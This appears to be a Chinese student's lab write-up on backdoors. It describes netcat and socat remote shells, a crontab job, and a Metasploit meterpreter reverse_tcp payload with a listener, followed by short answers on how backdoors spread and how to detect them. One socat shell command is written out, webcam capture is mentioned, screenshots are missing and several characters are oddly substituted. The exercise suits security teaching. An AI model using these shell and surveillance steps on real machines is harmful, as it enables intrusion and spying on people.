20155234 Exp2 后门原理与实践

Windows得到Linux Shell

1.查看ip

2.监听端口

3.实验成功以下图

Linux得到Win Shell

1.查看虚拟机ip

2.监听端口

3.实验成功以下图

使用NC传输数据

1.用crontab -e指令编辑一条定时任务

• 输入3，选vim.basic
  
  2.成功
  

  使用socat获取主机操做Shell, 任务计划启动

  在Windows系统下，打开控制面板->管理工具->任务计划程序，建立任务，填写任务名称后，新建一个触发器
  在Kali环境下输入指令socat - tcp:192.168.1.111:5234，这里的第一个参数-表明标准的输入输出，第二个流链接到Windows主机的5234端口，此时能够发现已经成功得到了一个cmd shell
  

  使用MSF meterpreter生成可执行文件，利用ncat或socat传送到主机并运行获取主机Shell

  1.在Kali上使用msfconsole指令进入msf控制台，set payload windows/meterpreter/reverse_tcp，使用监听模块，设置payload，设置反弹回连的IP和端口
  
  
  2.利用exploit，执行监听，在windows中，利用20155210.exe运行20155210.exe
  
  3.使用webcam_snap指令可使用摄像头进行拍照
  

  思考题

  (1)例举你能想到的一个后门进入到你系统中的可能方式？
• 在网上下载的软件
• 系统自带的后门
  (2)例举你知道的后门如何启动起来(win及linux)的方式？
• 经过和其余经常使用软件捆绑运行
  (3)Meterpreter有哪些给你映像深入的功能？
• 我我的以为是得到击键记录从而得到密码
  (4)如何发现本身有系统有没有被安装后门？

• 经过监视程序，查看程序是否得到了不应得到的系统资源。

  实验体会

  若是可以避免杀毒软件，经过后门能够随意获取不少系统的资源，有很大的危险